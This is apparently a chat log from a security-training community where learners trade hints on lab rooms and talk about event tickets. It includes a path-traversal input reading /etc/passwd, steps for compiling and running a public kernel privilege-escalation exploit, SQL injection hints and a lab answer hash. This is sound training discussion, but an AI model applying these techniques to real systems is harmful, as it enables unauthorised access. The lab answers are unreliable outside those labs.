Yes and no

ehh

There's more than 1 table

Only one of them will help you

#rabbithole

gotcha

Loool

wdym

I just tried with i and got 10s response wtf

Just because the table you have is an existing table dosent mean it contains the information you'll need

sed realities

is it just 5 letters or there's more?

@modest arch Check information in Task 7 and you will find what you are looking for, the names are very similar in both task 7 and task 8 & i'd also say check the SQL query box provided at the bottom of the screen. You may find in there that there is some information that you can use to escape your rabbit hole, in particular the ||select * from analytics_referrers|| should make you realise that the table you are searching in is not the right one.

Also bonus if you want it - When trying the password combo, don't waste time trying ||a-z as the passwords start with a numerical value||

FINALLY I DID IT

u showed also flag 😄

So on linux PrivEsc Task 10 (PATH) || I'm using the ./test script to run "thm", but thm isn't running with elevated perms even though test has the SUID bit. i've tried both cat and /bin/bash inside thm, but neither are working with elevated perms. any ideas as to what im doing wrong? ||

nevermind, I figured it out

I'm a little stuck on the File inclusion Task 4 can't seem to get the pathing right when trying to find the /etc/passwd directory.

Tried different paths but no good.

/index.php?lang=../../etc/passwd

This is my start. Is this a good start? ^

nope

Alright, i'll have a relook. Cheers

I got it xD I was overthinking it too much

awesome

I have been following along and I can ping it, but I still get no response once I open the ticket. I have tried inserting my vpn ip, an attackbox ip, and the tryhackme catcher. None catch anything.

how can i exploit cve 2015 in linux privesc if i have permission denied

which task?

first flag

kernel exploits

man the column name is easy to guess

cve 2015-1328

yaaas jus got it too

just as a heads up make sure to use spoiler tags (|| text ||) to not spoil anything for people who don't wanna see. anyway || they provide https://www.linuxkernelcves.com as a website with the task, so if you find the cve in there, there's a link to exploit db and some exploits that have been written for it. if you check there, you can find one that works. there are 2 i think (3 are listed but i think 2 are the same so). if you need more than this i can still help, just dont wanna give off too much ||

do you even read what i wrote?I got cve,i got exploit,but cant exploit it because of permision denied

Need to stop over thinking things lol. Well that an goin down rabbit holes lol

you said "how can i exploit" so i started from the beginning, sorry. for that || find a directory you have write permission to. usually /tmp has write permissions for everyone, then run the exploit||

Generate an MD4 hashsum of the phrase: Insecure Algorithms

when i base 64 this, THM doesnt like the answer ?

Im guessing this in in the burpsuite decoder?

yeah

||4dc57840665937bcbb97060544c32878||

thats the md4

has anybody else had issues with the vm in the last task of Metasploit Exploit?

the msfvenom one?

||NGRjNTc4NDA2NjU5MzdiY2JiOTcwNjA1NDRjMzI4Nzg=||

then base 64

it specifically asks for output in base64

for some reason my burp is missing the md4 option in decoder so i used cyberchef but im guessing that wont effect it

i think the issue is if you're copy/pasting it might add some strange characters in the background? when i did it it was just fine, but i can double check if you would like

ill double check on my box real quick

wicked cheers man

nmap live host discovery task 7

What option do you need to add to Nmap to run a TCP SYN ping scan on the telnet port?

this question sucks

why?

--help

unable to find the answer

what's the answer format?

read the section under "TCP SYN Ping" the second paragraph has the answer laid out right there

@lusty bolt ||sS just says SYN scan, and then you would --ports 23 or whatever. there's a combination command available that they're looking for ||

oh

How many days are these tickets we are given valid?

i think until the 27th you can earn them

@upper field so i double checked on mine, and it works. i'll send a screenshot of mine in case you want to just check it out

use this command:
man nmap | grep -i "tcp syn ping"

@sterile crescent Top man thank you

Gave +1 Rep to @sterile crescent

i got the answer ..lol

give me the few steps plz start ssh,then what

this was the worst question ever asked

@upper field ||try and get it yourself to see what you're doing wrong there||

no there are more questions like that lol

ill try manually type it instead of copy and paste

No I meant like do they get expired or sth

which exploit are you using? can you link it

i dont know with that

NoOOOOOooooooooOOOooOOOoOOoOOOooO

https://www.exploit-db.com/exploits/37292

look if there's anything i've learned from messing up on things, always ls -la and check it can exploit

only ticket part is expired, room stays

I'm gonna subscribe tomorrow ! I'm tired of getting single tickets

I mean like suppose I have tickets and I haven't redeemed them yet so if I don't redeem do they get vanished or become unusable?

logically yes

So until when is that?

okay so the top of this exploit shows usage || gcc ofs.c -o ofs you have to infer a bit with it. ofs.c is the c file that the rest of the code goes into (since its an OverlayFS vulnerability). you compile into ofs and then run it ./ofs and it should be good ||

They are available I mean

it doesn't depend on the subscription believe, i get an oscp ticket when i have one ticket only

yeah but getting more tickets is helpful, although my ticket page is painful and i have only windows pivesc left, so i dont think ill get anything

U made a good point lol

me too after subscription

ye but how can i run it on ssh not on my local machine

pentester title 1/7 day freeze

Idk what am I supposed to do with these extra pentester title tickets

don't download the code, copy paste into a file on the target

i didn't get u

I mean if there was an option to donate or sth

i mean if you get 2 per room it doesn't mean that you have a good chance

who knows it may happen

I have 2 more tickets to get, 1 more task for that

Any one else's jus crash out when u try claim tickets now lol

permisiion denied

are you in a writable directory? or an executable directory?

try not to get discouraged

idk which room are u doin but its better moving to /tmp and give the perms. (in most of the cases)

finished

changing permissions Operation not permitted

@rough ore

and no major prizes but didn't really expect any

Congrats

sed

I got 2 more tickets coming and i’m hoping for an eJPT myself

but I know it’s unlikely

good luck 🙂

I got 3 for HAK5 WiFi

btw, how many can get oscp? what's the limit?